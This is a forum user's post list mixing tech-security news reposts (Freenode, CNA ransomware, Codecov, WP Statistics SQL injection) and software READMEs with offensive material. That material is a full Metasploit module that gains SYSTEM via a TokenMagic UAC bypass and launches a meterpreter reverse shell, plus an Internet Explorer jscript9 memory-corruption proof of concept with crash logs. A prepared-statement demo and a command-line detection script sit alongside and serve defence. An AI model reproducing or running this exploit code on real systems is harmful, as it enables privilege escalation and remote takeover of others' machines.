Everything posted by Kev

  1. Kev

    UFO and stuff

    I would call them drones, and one of the first projects was Aurel Vlaicu's, which was not completed because he was assassinated.
  2. Freenode IRC staff resign en masse after takeover by Korea’s “crown prince” Former staffer alleges "a hostile entity is now in control... and has your data." Freenode currently ranges between roughly 75,000 and 90,000 users—that's a far cry from the 240,000 users fellow IRC network QuakeNet had back in 2005, but it's still quite a lot of people. Freenode has been the world's largest IRC network since 2013, with roughly three times as many users as its closest competitor, IRCnet. Last week, the massive IRC network was taken over by tech entrepreneur and "Korean Crown Prince" Andrew Lee—a move that the network's staff has apparently unanimously classified as a "hostile takeover," although Lee himself claims these are only "rumors" and "simply untrue." At first blush, it's tempting for an outside observer—someone who isn't already familiar with the history of the network's ownership and management—to shrug and say "well, who knows." Lee lays out several hundred words of explanation in a blog post currently featured on Freenode's front page—most of which sounds reasonable. But the one question Lee never addresses—let alone answers—is why at least 14 separate staff members would quit en masse, all disagreeing with the story he tells. A dubious contract In 2017, Christel Dahlskjaer—who was, at the time, head of Freenode staff—created a corporation, Freenode Ltd., which she immediately sold to Lee. Dahlskjaer and Lee told Freenode staff and users that the incorporation was only done as necessary paperwork in order to sponsor a conference and that day-to-day operations would remain unchanged. Contract or no contract, staff and developers of Freenode maintain that it wasn't actually possible to sell the network—the staff is all volunteers, and the infrastructure itself wasn't owned by Dahlskjaer in the first place. According to resigning Freenode developer Aaron Jones, however, "Andrew has more money than us, and so we cannot fight this." 
Although the contract in question was signed in 2017, staffers didn't begin objecting until this year, when operational changes began appearing without their control or consent. A unilateral decision on advertising In February 2021, Dahlskjaer placed the logo for Shells—a Lee-owned company offering cloud-based virtual desktops—prominently on Freenode's front page. By itself, this might seem innocuous—FOSS projects accept sponsorships and advertising all the time. But staffers, who were supposedly still in control of the network, weren't consulted about the arrangement—and they did not approve. One reason for staffers' virulent disapproval is Shells CTO Mark Karpelès. Karpelès is the founder of the defunct Mt. Gox bitcoin exchange, which lost nearly 850,000 bitcoin (currently worth a staggering $33.4 billion-with-a-B US dollars) to attackers who exploited a massive security flaw. Karpelès was found guilty in a Tokyo court of deliberately tampering with records to cover up the exchange's various losses, although he was found innocent of outright embezzlement. As former staffer Aaron Jones explains in his lengthy letter of resignation—which links to similar announcements from other departing high-profile staffers—this wasn't the only issue with the new ad. According to Jones, sponsorships are normally only found at freenode.net/acknowledgements—making the prominent Shells logo in the upper right of Freenode's front page more of a departure from the norm than it might seem. Jones goes on to say that Dahlskjaer was either unable or unwilling to explain the sudden new ad to staffers, choosing to resign instead. (Lee claims that Freenode staff "harassed" Dahlskjaer into resignation; Jones and other departing staffers deny this characterization.) Freenode staff elected Tom Wesley (aka tomaw) to replace her. 
Escalation in April Beginning in April 2021, Lee's exercise of control continued ramping up: Staffers created a blog post outlining changes in leadership and announcing a change to newly developed back-end ircd software Solanum. According to Jones, Lee summarily removed the post—and manually edited the website's built-in history to create the impression that it had never existed. Later in April, a Freenode test network—in use to get ready for the infrastructure shift to Solanum—was shut down without discussion. Wesley (tomaw) performed the shutdown and refused to say why; Jones and others believe Lee was behind the shutdown, used threat of legal force to make Wesley comply, and issued related gag orders to OFTC staff. Lee registered the channel #freenode-board without discussing it with staff—and, according to Jones, without proper authority (since only official group contacts are allowed to create channels in Freenode's primary namespace, and Lee was not an official Freenode contact). Shane Allen (aka nirvana), an associate and employee of Lee's, bragged about "turning" tomaw, and he attempted to bribe prominent user Ariadne with promises of ops privileges, saying, "I'll make sure you get +o0 in #freenode so you can kick people. My gift to you pal." On May 11, Lee began issuing notices to staff as a group and directly to individual Freenode staffers. Everything came from "the board"—an entity that staffers say never existed, and even now is merely a euphemism for Lee himself. On May 12, Lee (aka rasengan) posted his version of events—in which he claims legal ownership of Freenode, along with a list of grievances—in a Github gist. (The gist is considerably saltier than the version of events Lee posted to Freenode's public-facing blog a week later.) Libera Chat A week after Lee's effectively public announcement of ownership and de facto dictatorial operation of Freenode, the staffers who resigned from Freenode created Libera.chat as a replacement. 
Libera Chat is incorporated as a Swedish nonprofit organization, owned and operated by volunteer staffers who are voting members of the organization. It has a small, member-elected board—currently consisting of chair, treasurer, projects and community rep, engineering rep/vice chair, and operations rep. But most decisions are to be taken by the membership as a whole. The membership also elects two auditors, tasked with auditing the board's actions on behalf of the membership. A transparency report is to be published annually, detailing bookkeeping and the auditors' findings along with the standard annual report from the board itself. All current Libera Chat boardmembers and auditors are Freenode staffers who resigned in protest of Lee's recent actions and assumption of control. Via arstechnica.com
  3. Hi. I got indexed in all the search engines (Bing, Google, etc.) with a "free html/css template" meta; I edited the whole site, including the (c), and for 4-5 days it has been up with the same tag. What can I do? Thanks in advance.
  4. ^ Off-topic, me too: cut him off so the Indian learns to read. On-topic: the parameters are interesting; anyway, it's fixed.
  5. Kev

    macOCR

    macOCR is a command line app that enables you to turn any text on your screen into text on your clipboard. When you invoke the ocr command, a "screen capture" like cursor is shown. Any text within the bounds will be converted to text. You could invoke the app using the likes of Alfred.app, Hammerspoon, Quicksilver etc. An example Alfred.app workflow is available here. If you're still wondering "how does this work?", I always find the .gif is the best way to clarify things:

    Installation

    Compile the code in this repo, or download a prebuilt binary (Apple Silicon, Intel) and put it on your path.

    Apple Silicon Install:

        curl -O https://files.littlebird.com.au/ocr.zip; unzip ocr.zip; sudo cp ocr /usr/local/bin;

    Intel Install:

        curl -O https://files.littlebird.com.au/ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; unzip ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; sudo cp ocr /usr/local/bin;

    When running the app the first time, you will likely be asked to allow the app access to your screen.

    OS Support

    This should run on Catalina and above.

    Who made this?

    macOCR was made by Marcus Schappi. I create software (and even hardware) to automate ecommerce, including: Chick Commerce. This free Australia Post app on Shopify. Script Ninja which enables you to create powerful scripts and tools to automate your Shopify store.

    Thoughts on Sherlocking?

    Apple, please sherlock this software!

    MIT License

    Copyright 2021 Marcus Schappi

    Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download macOCR-master.zip or git clone https://github.com/schappim/macOCR.git Source
  6. The plugin, installed on hundreds of thousands of sites, allows anyone to filch database info without having to be logged in. WP Statistics, a plugin installed on more than 600,000 WordPress websites, has an SQL-injection security vulnerability that could let site visitors make off with all kinds of sensitive information from web databases, including emails, credit-card data, passwords and more. WP Statistics, as its name suggests, is a plugin that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymized data around IP addresses, referring sites, and country- and city-level details for visitors, all presented in the form of charts and graphs. Wordfence researchers found the high-severity bug (tracked as CVE-2021-24340, rating 7.5 out of 10 on the CVSS scale) in the “Pages” function, which lets administrators see which pages have received the most traffic. It returns this data using SQL queries to a back-end database – but it turns out that unauthenticated attackers can hijack the function to perform their own queries, in order to purloin sensitive information. The specific vulnerability is a time-based blind SQL injection, according to researchers at Wordfence. This technique involves sending requests to the database that “guess” at the content of a database table and instruct the database to delay the response or “sleep” if that guess is correct. For instance, an attacker could ask the database if the first letter of the admin user’s email address starts with the letter “A,” and instruct it to delay the response by five seconds if this is true. The only reliable method of preventing SQL injection is to prepare all SQL statements before executing them, researchers added. 
Prepared statements isolate each query parameter so that an adversary would not be able to see the entire scope of the data that’s returned. VeronaLabs, the plugin’s developer, has released a patch with version 13.0.8, so site administrators should update as quickly as possible. A similar bug was found earlier in May, which impacted the “Spam protection, AntiSpam, FireWall by CleanTalk” plugin, which is installed on more than 100,000 sites. It too allowed adversaries to use the time-based blind SQL approach, also without having to be logged on to mount an attack. Via threatpost.com
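What preparing the statement changes, as an added example that is not from the article or from the plugin's code: the same lookup is built once by string concatenation and once with a bound parameter, and each is fed the same request values. It uses Python's sqlite3 with a hypothetical `page_hits` table; `probe()` is a harmless counter that stands in for the database delay function a time-based blind injection relies on.

```python
import sqlite3


class Probe:
    """Counts how often the database itself invokes probe().

    Stand-in for the delay ("sleep") side effect of a time-based blind
    injection: no rows need to leak for the caller to learn that injected
    SQL was executed by the database.
    """

    def __init__(self):
        self.calls = 0

    def __call__(self):
        self.calls += 1
        return 1


def make_db(probe):
    # Constructed sample data; table and column names are hypothetical.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE page_hits (page_id INTEGER, uri TEXT, hits INTEGER);
        INSERT INTO page_hits VALUES (1, '/home', 120), (2, '/about', 45),
                                     (3, '/contact', 9);
        """
    )
    conn.create_function("probe", 0, probe)
    return conn


def hits_concatenated(conn, page_id):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT uri, hits FROM page_hits WHERE page_id = " + page_id
    return conn.execute(sql).fetchall()


def hits_prepared(conn, page_id):
    """Prepared statement: the value is bound and can only ever be data."""
    sql = "SELECT uri, hits FROM page_hits WHERE page_id = ?"
    return conn.execute(sql, (page_id,)).fetchall()


def compare(request_value):
    """Run both variants on one request value.

    Returns {variant: (rows, number_of_probe_calls)}.
    """
    results = {}
    for name, query in (("concatenated", hits_concatenated),
                        ("prepared", hits_prepared)):
        probe = Probe()
        conn = make_db(probe)
        try:
            rows = query(conn, request_value)
        except sqlite3.Error as exc:
            rows = "error: " + str(exc)
        finally:
            conn.close()
        results[name] = (rows, probe.calls)
    return results


if __name__ == "__main__":
    # A normal value, a condition that widens the result set, and a
    # condition that makes the database call a function.
    for value in ("2", "2 OR 1=1", "2 AND probe()"):
        print(repr(value), compare(value))
```

In the concatenated variant the last value makes the database call `probe()` even though the caller gets back nothing unusual; in the prepared variant the whole string is compared as a value, matches no row, and nothing is executed.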
  7. The CNA headquarters in Chicago. Photographer: AYNSLEY FLOYD/Bloomberg CNA Financial Corp., among the largest insurance companies in the U.S., paid $40 million in late March to regain control of its network after a ransomware attack, according to people with knowledge of the attack. The Chicago-based company paid the hackers about two weeks after a trove of company data was stolen, and CNA officials were locked out of their network, according to two people familiar with the attack who asked not to be named because they weren’t authorized to discuss the matter publicly. In a statement, a CNA spokesperson said the company followed the law. She said the company consulted and shared intelligence about the attack and the hacker’s identity with the FBI and the Treasury Department’s Office of Foreign Assets Control, which said last year that facilitating ransom payments to hackers could pose sanctions risks. In a security incident update published on May 12, CNA said it did “not believe that the systems of record, claims systems, or underwriting systems, where the majority of policyholder data – including policy terms and coverage limits – is stored, were impacted.” Ransomware attacks -- and particularly payments -- are rarely disclosed so it’s difficult to know what the biggest ransoms have been. The average payment in 2020 was $312,493, according to Palo Alto Networks, a 171% increase over the previous year. The $40 million payment is bigger than any previously disclosed payments to hackers, according to three people familiar with ransomware negotiations. The CNA hackers used malware called Phoenix Locker, a variant of ransomware dubbed ‘Hades.’ Hades was created by a Russian cybercrime syndicate known as Evil Corp., according to cybersecurity experts. Evil Corp. was sanctioned by the U.S. in 2019. However, attributing attacks can be difficult because hacking groups can share code or sell malware to one another. 
CNA, which offers cyber insurance, said its investigation concluded that the hackers were a group called Phoenix that isn’t subject to U.S. sanctions. Disclosure of the payment is likely to draw the ire of lawmakers and regulators already unhappy that U.S. companies are making large payouts to criminal hackers who over the last year have targeted hospitals, drug makers, police forces and other entities critical to public safety. The FBI discourages organizations from paying ransom because it encourages additional attacks and doesn’t guarantee data will be returned. Ransomware is a type of malware that encrypts a victim’s data. Cybercriminals using ransomware often steal the data too. The hackers then ask for a payment to unlock the files and promise not to leak stolen data. In recent years, hackers have been targeting victims with cyber insurance policies and huge volumes of sensitive consumer data that make them more likely to pay a ransom, according to cybersecurity experts. Last year was a banner year for ransomware groups, according to a task-force of security experts and law enforcement agencies which estimated that victims paid about $350 million in ransom last year, a 311% increase over 2019. The task force recommended 48 actions that the Biden administration and private sector could take to mitigate such attacks, including better regulation of the digital currency market used to make ransom payments. The report, prepared by the Institute for Security and Technology, was delivered to the White House days before Colonial Pipeline Co. was compromised in a ransomware attack that led to fuel shortages and long lines at gas stations along the East Coast of the U.S. Bloomberg reported that Colonial paid the hackers nearly $5 million shortly after the attack; Colonial Chief Executive Officer Joseph Blount, in an interview with the Wall Street Journal published on Wednesday, confirmed that the company paid the hackers -- $4.4 million in ransom. 
According to the two people familiar with the CNA attack, the company initially ignored the hackers’ demands while pursuing options to recover their files without engaging with the criminals. But within a week, the company decided to start negotiations with the hackers, who were demanding $60 million. Payment was made a week later, according to the people. Via bloomberg.com
  8. WunderGraph Realtime Chat Example using NextJS, TypeScript & PostgreSQL

    Description

    This Example demonstrates how to build a production-grade Realtime Chat application by writing two GraphQL Queries.

    Features:

      • Authentication
      • Authorization
      • Realtime Updates
      • Cross Tab Login/Logout
      • typesafe generated Typescript Client

    Prerequisites

    Make sure you have docker compose installed. Alternatively, you can use any PostgreSQL database available on localhost.

    Getting Started

    Install the dependencies and run the example:

        yarn global add @wundergraph/wunderctl@latest
        yarn
        yarn dev

    Questions? Read the Docs. Join us on Discord!

    Download: nextjs-typescript-postgresql-realtime-chat-main.zip or git clone https://github.com/wundergraph/nextjs-typescript-postgresql-realtime-chat.git

    Source
  9. This Metasploit module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Msf::Exploit::EXE # Needed for generate_payload_dll
      include Msf::Exploit::FileDropper
      include Msf::Post::File
      include Msf::Post::Windows::FileSystem
      include Msf::Post::Windows::Powershell
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::ReflectiveDLLInjection
      prepend Msf::Exploit::Remote::AutoCheck

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Windows Privilege Escalation via TokenMagic (UAC Bypass)',
            'Description' => %q{
              This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'James Forshaw', # Research
              'Ruben Boonen (@FuzzySec)', # PoC
              'bwatters-r7', # msf module
              'jheysel-r7' # msf module
            ],
            'Platform' => ['win'],
            'SessionTypes' => ['meterpreter'],
            'Targets' => [
              [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
            ],
            'DefaultTarget' => 0,
            'DisclosureDate' => '2017-05-25',
            'References' => [
              ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
              ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
              ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
              ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
            ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
              'WfsDelay' => 900
            }
          )
        )

        register_options([
          OptString.new('SERVICE_NAME', [false, 'Service Name to use (Random by default).', Rex::Text.rand_text_alpha(5..9)]),
          OptString.new('WRITABLE_DIR', [false, 'Directory to write file to (%TEMP% by default).', nil]),
          OptString.new('SERVICE_FILENAME', [false, 'Filename for Service Payload (Random by default).', Rex::Text.rand_text_alpha(5..9)]),
          OptEnum.new('METHOD', [
            true, 'SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
            Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger',
            'SERVICE', ['SERVICE', 'DLL']
          ])
        ])
      end

      def setup_process
        begin
          print_status('Launching notepad to host the exploit...')
          notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
          process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
          print_good("Process #{process.pid} launched.")
        rescue Rex::Post::Meterpreter::RequestError
          # Sandboxes could not allow to create a new process
          # stdapi_sys_process_execute: Operation failed: Access is denied.
          print_error('Operation failed. Trying to elevate the current process...')
          process = client.sys.process.open
        end
        process
      end

      def inject_magic(process)
        if sysinfo['Architecture'] == ARCH_X64
          library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
        elsif sysinfo['Architecture'] == ARCH_X86
          library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll')
        end
        library_path = ::File.expand_path(library_path)

        print_status("Reflectively injecting the trigger DLL into #{process.pid}...")
        dll = ::File.read(library_path)
        exploit_mem, offset = inject_dll_data_into_process(process, dll)
        print_good('Trigger injected.')
        payload_mem = inject_into_process(process, payload.encoded)
        print_good('Payload injected. Starting thread...')
        process.thread.create(exploit_mem + offset, payload_mem)
      end

      def launch_dll_trigger
        print_status('Trying to start notepad')
        process = setup_process
        inject_magic(process)
        print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
      rescue Rex::Post::Meterpreter::RequestError => e
        elog(e)
        print_error(e.message)
      end

      def payload_arch
        payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86
      end

      def exploit
        win_dir = session.sys.config.getenv('windir')
        cmd_path = "#{win_dir}\\system32\\cmd.exe"
        if datastore['SERVICE_FILENAME']
          service_filename = datastore['SERVICE_FILENAME']
        else
          service_filename = Rex::Text.rand_text_alpha(5..9)
        end
        service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')
        if datastore['SERVICE_NAME']
          service_name = datastore['SERVICE_NAME']
        else
          service_name = Rex::Text.rand_text_alpha(5..9)
        end
        if datastore['WRITABLE_DIR']
          writable_dir = datastore['WRITABLE_DIR']
        else
          writable_dir = session.sys.config.getenv('TEMP')
        end
        if datastore['METHOD'] =~ /DLL/i
          bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
          payload = generate_payload_dll
          vprint_status("Payload DLL is #{payload.length} bytes long")
          client.core.use('powershell') unless client.ext.aliases.include?('powershell')
          register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
          # Replace Value in Generic Script.
          cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll"
        else
          bin_path = "#{writable_dir}\\#{service_filename}"
          payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
          vprint_status("Service Name = #{service_name}")
          client.core.use('powershell') unless client.ext.aliases.include?('powershell')
          # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
          cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
        end

        # Check target
        print_status('Checking Target')
        validate_active_host
        validate_payload

        # Upload the payload
        print_status("Uploading payload to #{bin_path}")
        write_file(bin_path, payload)
        register_file_for_cleanup(bin_path)

        # Read in Generic Script
        script = exploit_data('tokenmagic', 'tokenmagic.ps1')
        script.gsub!('_CMD_PATH_', cmd_path)
        script.gsub!('_CMD_ARGS_', cmd_args)

        # Run Exploit Script
        print_status("Running Exploit on #{sysinfo['Computer']}")
        begin
          print_status('Executing TokenMagic PowerShell script')
          session.powershell.execute_string({ code: script })
        rescue Rex::TimeoutError => e
          elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
          print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
        end

        if datastore['METHOD'] =~ /DLL/i
          launch_dll_trigger
          print_status("Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger and recieve a shell.")
        end
        print_good('Enjoy the shell!')
      end

      def validate_active_host
        print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
      rescue Rex::Post::Meterpreter::RequestError => e
        elog('Could not connect to session', error: e)
        raise Msf::Exploit::Failed, 'Could not connect to session'
      end

      def validate_payload
        vprint_status("Target Arch = #{sysinfo['Architecture']}")
        vprint_status("Payload Arch = #{payload.arch.first}")
        unless payload.arch.first == sysinfo['Architecture']
          fail_with(Failure::NoTarget, 'Payload arch must match target arch')
        end
      end

      def check
        sysinfo_value = sysinfo['OS']
        build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)
        if build_num.nil?
          return CheckCode::Unknown("Couldn't retrieve the target's build number!")
        else
          vprint_status("Target's build number: #{build_num}")
          build_num = build_num[0].to_i
        end
        vprint_status("Build Number = #{build_num}")
        if datastore['METHOD'] =~ /service/i
          # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
          return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
        elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
          # DLL method has been tested on Windows 10 (1703 to 1803)
          return Exploit::CheckCode::Appears
        elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
          print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
        end
        Exploit::CheckCode::Safe
      end
    end

    Source
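A detection sketch for the module above, added here and not part of the module or the original post: the module hands cmd.exe one of two fixed argument strings (`cmd_args`), so process-creation telemetry that records command lines (for example Windows Security event 4688 with command-line auditing, or Sysmon event ID 1) can be matched against both shapes. The event field names (`host`, `command_line`) and the sample command lines are constructed assumptions.

```python
import re

# Shape of the SERVICE method's cmd_args:
#   /c sc create <name> binPath= <file>.exe type= own start= demand && sc start <name>
# The back-reference requires that the service just created is started at once.
SERVICE_RE = re.compile(
    r"/c\s+sc\s+create\s+(?P<name>\S+)\s+binPath=\s*(?P<path>.+?\.exe)\s+"
    r"type=\s*own\s+start=\s*demand\s*&&\s*sc\s+start\s+(?P=name)(?!\S)",
    re.IGNORECASE,
)

# Shape of the DLL method's cmd_args:
#   /c move <dir>\WindowsCoreDeviceInfo.dll C:\Windows\System32\WindowsCoreDeviceInfo.dll
DLL_RE = re.compile(
    r"/c\s+move\s+(?P<path>.+?)\s+"
    r"(?P<dest>\S*\\Windows\\System32\\WindowsCoreDeviceInfo\.dll)\s*$",
    re.IGNORECASE,
)

# The module stages its file in %TEMP% unless WRITABLE_DIR is set, so a source
# path under a per-user directory raises confidence (heuristic, an assumption).
USER_WRITABLE_RE = re.compile(r"\\(?:temp|appdata)\\", re.IGNORECASE)


def classify(command_line):
    """Return a finding dict if the command line has one of the two shapes."""
    match = SERVICE_RE.search(command_line)
    if match:
        return {"method": "SERVICE", "service": match.group("name"),
                "staged": match.group("path")}
    match = DLL_RE.search(command_line)
    if match:
        return {"method": "DLL", "service": None,
                "staged": match.group("path")}
    return None


def scan(events):
    """Classify every event and return findings enriched with host context."""
    findings = []
    for event in events:
        hit = classify(event["command_line"])
        if hit is None:
            continue
        hit["host"] = event["host"]
        hit["user_writable_source"] = bool(USER_WRITABLE_RE.search(hit["staged"]))
        findings.append(hit)
    return findings


# Constructed sample events: two that follow the module's command shapes and
# three ordinary administrative commands that must not match.
SAMPLE_EVENTS = [
    {"host": "WS-014", "command_line":
        r"C:\Windows\system32\cmd.exe /c sc create qWzRtYp binPath= "
        r"C:\Users\alice\AppData\Local\Temp\kJhGfDs.exe type= own "
        r"start= demand && sc start qWzRtYp"},
    {"host": "WS-022", "command_line":
        r"C:\Windows\system32\cmd.exe /c move "
        r"C:\Users\alice\AppData\Local\Temp\WindowsCoreDeviceInfo.dll "
        r"C:\Windows\System32\WindowsCoreDeviceInfo.dll"},
    {"host": "WS-014", "command_line":
        r"C:\Windows\system32\cmd.exe /c sc query wuauserv"},
    {"host": "SRV-003", "command_line":
        r'C:\Windows\system32\cmd.exe /c sc create BackupAgent binPath= '
        r'"C:\Program Files\Backup\agent.exe" type= own start= auto'},
    {"host": "BLD-001", "command_line":
        r"C:\Windows\system32\cmd.exe /c move C:\build\out\plugin.dll "
        r"C:\build\stage\plugin.dll"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The service and file names are random by default (`Rex::Text.rand_text_alpha(5..9)`), so the rules key on the command structure and on the fixed `WindowsCoreDeviceInfo.dll` destination rather than on names.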
  10. Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. On Thursday, the cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script. The cyberattack against Codecov took place on or around January 31, 2021, and was made public on April 15. The organization, which provides code coverage and testing tools, said that a threat actor tampered with the Bash uploader script, thereby compromising the Codecov-actions uploader for GitHub, Codecov CircleCI Orb, and the Codecov Bitrise Step. This enabled attackers to export data contained in user continuous integration (CI) environments. Hundreds of clients were potentially impacted, and now, Rapid7 has confirmed that the company was one of them. Rapid7 says the Bash uploader was used in a limited fashion as it was only set up on a single CI server used to test and build tooling internally for the Managed Detection and Response (MDR) service. As such, the attacker was kept away from product code, but they were able to access a "small subset of source code repositories" for MDR, internal credentials -- all of which have now been rotated -- and alert-related data for some MDR customers. Rapid7 has reached out to customers impacted by the data breach. The company pulled in cyberforensics assistance and following an investigation, has concluded that no other corporate systems or production environments were compromised. Codecov has since removed the unauthorized actor from its systems and is setting up monitoring and auditing tools to try and prevent another supply chain attack from occurring in the future. Impacted customers were notified via email addresses on record and through the Codecov app. 
Codecov recommends that users of the Bash uploaders between January 31, 2021, and April 1, 2021, who did not perform a checksum validation should re-roll their credentials out of caution. Via zdnet.com
  11. There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.

    Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object

    The following minimal sample is sufficient to trigger the bug:

    ############################################################
    <!-- saved from url=(0014)about:internet -->
    <script>
    function main() {
      function v4(v5,v6) {
        with ({}) {
          arguments();
        }
      }
      for(var i=0; i <1; i++)
        v4(1);
    }
    alert('start');
    main();
    alert('end');
    </script>
    ############################################################

    When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax.

    jscript9!Js::JavascriptFunction::CallFunction<1>+0x39:
    68c2d6e9 8bb850020000 mov edi,dword ptr [eax+250h] ds:002b:00000250=????????

    On the first glance, it might look like a null pointer dereference, however the value of eax in this case was read from uninitialized memory.

    There are also different ways to trigger the crash when accessing the arguments object. The following sample demonstrates a crash when reading from a controllable address:

    ############################################################
    <!-- saved from url=(0014)about:internet -->
    <script>
    function test() {
      test.caller.arguments.length = (0x13371337>>1);
    }
    function main() {
      function v4(v5,v6) {
        test();
        with ({}) {
          arguments.length;
          arguments();
        }
      }
      for(var i=0; i <1; i++)
        v4(1);
    }
    alert('start');
    main();
    alert('end');
    </script>
    ############################################################

    This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h:

    jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
    68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=????????

    The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution.

    I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable.

    Full debug log:

    ############################################################
    (1654.14e8): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000
    eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0 nv up ei pl nz na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
    jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
    68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=????????

    0:009> k
     # ChildEBP RetAddr
    00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35
    01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5
    02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd
    03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    04 053bc750 68c2d743 0xb9a0fd9
    05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
    06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
    07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
    08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
    09 053bc940 68c2d743 0xb9a0fe1
